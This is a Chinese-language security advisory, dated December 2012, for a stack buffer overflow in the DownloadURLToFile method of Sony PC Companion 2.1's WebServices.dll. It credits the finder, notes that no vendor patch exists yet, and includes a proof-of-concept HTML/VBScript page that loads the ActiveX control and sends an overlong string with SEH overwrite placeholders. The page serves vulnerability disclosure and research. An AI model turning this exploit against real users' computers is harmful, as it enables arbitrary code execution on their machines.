Sony PC Companion 'DownloadURLToFile()函数栈缓冲区溢出漏洞
发布日期:2012-12-20
更新日期:2012-12-24
受影响系统:sonymobile PC Companion 2.1
描述:
BUGTRAQ ID:
57028
Sony PC Companion是连接设备到计算机的工具和应用。
Sony PC Companion 2.10.115、2.10.108及其他版本处理DownloadURLToFile函数内的'bstrFile'超长值时,WebServices.dll内存在边界错误,可被利用造成栈缓冲区溢出,导致在受影响计算机内执行任意代码。
<*来源:Gjoko Krstic (
liquidworm@gmail.com)
链接:
http://packetstormsecurity.org/files/119017/Sony-PC-Companion-2.1-Unicode-Buffer-Overflow.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
---
<html>
<body>
<object classid='clsid:0F987E61-9C94-49FA-9B6D-2F99BDEB6CF6' id='overrun' />
<script language='vbscript'>
targetFile = "C:\Program Files\Sony\Sony PC Companion\WebServices.dll"
prototype = "Sub DownloadURLToFile ( ByVal bstrUrl As String , ByVal bstrFile As String )"
memberName = "DownloadURLToFile"
progid = "WebServicesLib.HttpClient"
argCount = 2
bstrUrl="defaultV"
bstrFile=String(758, "A") + "BB" + "CC" + String(4238, "D")
' ^ ^ ^ ^
' | | | |
'----------- junk --------- nseh - seh ------- junk --------
overrun.DownloadURLToFile bstrUrl, bstrFile
</script>
</body>
</html>
建议:
厂商补丁:
sonymobile
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.sonymobile.com/cn/浏览次数:4038
严重程度:0(网友投票)
